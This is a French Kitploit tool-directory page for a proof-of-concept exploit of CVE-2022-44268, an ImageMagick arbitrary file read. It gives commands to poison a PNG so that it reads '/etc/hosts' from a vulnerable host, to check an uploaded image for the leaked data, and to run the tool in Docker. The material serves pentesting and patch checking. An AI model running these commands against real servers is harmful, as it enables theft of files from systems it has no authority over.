Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-44268 — CVE-2022-44268 ImageMagick Lecture arbitraire de fichier - Exploit de preuve de concept | Kitploit
Outils/GitHubGitHub/kljunowsky/cve-2022-44268
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubkljunowsky/cve-2022-44268

CVE-2022-44268

CVE-2022-44268 ImageMagick Lecture arbitraire de fichier - Exploit de preuve de concept

Voir le dépôt
278il y a 2 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2022-44268 🧙‍♂️

CVE-2022-44268 ImageMagick Lecture de fichier arbitraire - Preuve de concept d'exploit

Vidéo 📼

https://youtu.be/quKxwNAMBIA

Utilisation 🛠

Empoisonner l'image ☣️

root@kitploit:~
python3 CVE-2022-44268.py --image imagetopoison.png --file-to-read /etc/hosts --output poisoned.png
root@kitploit:~
Télécharger l'image PNG empoisonnée.

Vérifier si l'exploit a réussi 🗡

root@kitploit:~
python3 CVE-2022-44268.py --url http://vulnerable-imagemagick.com/uploads/vulnerable.png

Exécution avec Docker 🐳

Construction

root@kitploit:~
docker build -t cve-2022-44268 .

Exécution

root@kitploit:~
docker run -v $(pwd)/data:/data -ti cve-2022-44268 --image /data/random.png --file-to-read "/etc/hosts" --output /data/poisoned.png

Paramètres 🧰

Contactez-moi📇

Twitter - Milan Jovic

LinkedIn - Milan Jovic

À des fins éducatives uniquement et ne peut être utilisé pour enfreindre la loi ou à des fins personnelles.

L'auteur de ce projet n'est pas responsable des éventuels dommages causés par les matériaux de ce projet.

Plus de détails : https://www.metabaseq.com/imagemagick-zero-days/

Télécharger l’outil
ParamètreDescriptionType
--urlL'URL de l'image PNG téléchargéeChaîne
--imageFichier PNG d'entréeFichier
--outputFichier PNG de sortieFichier
--file-to-readFichier à lire depuis l'hôte vulnérableChaîne